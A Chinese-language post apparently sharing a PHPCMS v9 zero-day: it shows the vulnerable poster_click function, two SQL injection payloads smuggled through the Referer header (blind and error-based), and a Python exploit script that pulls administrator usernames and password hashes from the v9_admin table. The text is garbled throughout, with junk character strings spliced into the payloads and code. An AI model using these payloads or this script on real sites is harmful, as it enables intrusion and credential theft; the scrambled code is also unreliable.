有人放出了 phpcms v9 的 0day，就随手写了个利用代码，其中注入代码有两种形式：
问题函数：\phpcms\modules\poster\index.php
public function poster_click() {
    // Records a click on poster (ad) $id, increments its click counter and
    // redirects the browser to the poster's link.  This is the "problem
    // function" the post refers to: the click row is assembled from
    // request-controlled values, and the post reports that the Referer
    // value reaches the INSERT unescaped.
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0; // cast to int, so $id itself is a safe query value
    $r = $this->db->get_one(array('id'=>$id));
    if (!is_array($r) && empty($r)) return false; // no such poster (the two tests overlap; empty($r) alone would do)
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();                  // client address as returned by the ip() helper (not shown here; confirm it is not derived from spoofable headers)
    $area = $ip_area->get($ip);  // geo-lookup result; whether it is escaped is not visible here
    $username = param::get_cookie('username') ? param::get_cookie('username') : ''; // cookie-controlled; whether get_cookie() sanitises is not visible here
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // Injection sink named by this post: HTTP_REFERER is attacker-controlled
        // and is inserted as-is.  Whether s_db->insert() escapes its values is
        // not visible here; the fix is to escape or parameterise every
        // non-integer value (referer, username, area) before it reaches the query.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    $setting = string2array($r['setting']);
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        // NOTE(review): whenever count($setting) != 1, an arbitrary $_GET['url']
        // becomes the redirect target without validation -- an open-redirect
        // risk separate from the injection; restrict it to the configured
        // link URLs.
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    header('Location: '.$url);
}
利用方式：
1、可以采用盲注入的手法：
; Q* r. i; [( G# e4 breferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
通过返回页面正常与否，一个个猜解密码字段。
2、代码是花开写的，随手附上了：
& {. d$ c2 O. l0 j; c% i5 ~1 n1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
此方法是报错注入手法，原理自查。
利用程序：
- S4 N% \( a6 z. Q) g* i* ^#!/usr/bin/env python
1 w4 \, L* F/ G* u# oimport httplib,sys,re( x' N H5 s$ S. O! g$ F: g. P
- m! q2 | l& |0 k" k2 Ldef attack():( x9 ^2 h0 V. i; e, I: F G
print “Code by Pax.Mac Team conqu3r!”/ w, o1 G# C& V# z ]( }) B/ D5 E
print “Welcome to our zone!!!”
) C2 ]: |8 U$ m+ k7 X' _+ ]% Kurl=sys.argv[1]
* G: S- R) ?* N$ ?, p- h! Tpaths=sys.argv[2]( y$ x5 l: w! `% X
conn = httplib.HTTPConnection(url)
; r0 { n+ V3 li_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
9 h5 D! W2 g; B4 t; k: r$ X“Accept”: “text/plain”,- F# Y" u* ]9 p& H/ a d+ d# D* B# I
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
5 o: r F& ^6 `9 sconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
$ c8 w- b1 I' ?$ {: t5 K: Kr1 = conn.getresponse()7 P! N( x8 T' \' q7 R/ [" V
datas=r1.read()
- W$ U" O% k; x G, r0 d( Idatas=re.findall(r”Duplicate entry \’\w+’”, datas)
6 J) U* t6 r5 C; {% I+ L5 ~print datas[0]# _3 P2 K* i" H" r# F1 H+ }& F
conn.close()" I1 v6 g, C2 g9 j" t9 ~
if __name__==”__main__”:1 r$ X) r- E: R) q- U
if len(sys.argv)<3:6 v, b+ }+ a8 a1 ^3 \. |9 V
print “Code by Pax.Mac Team conqu3r”
8 e+ M% D- [/ x. n* xprint “Usgae:”
9 Y, M+ X8 F# g( N1 j. Qprint “ phpcmsattack.py www.paxmac.org /”
) h. @( q8 U+ ]- p" oprint “ phpcmsataack.py www.paxmac.org /phpcmsv9/”9 z0 ^4 E3 |* M2 q
sys.exit(1)
+ {0 {" c3 i8 z- D# D4 S$ d9 Dattack() p P# |$ s$ b( [8 v: H
! b) }1 M2 t, R: v8 Y* n0 l) s. z- s3 u |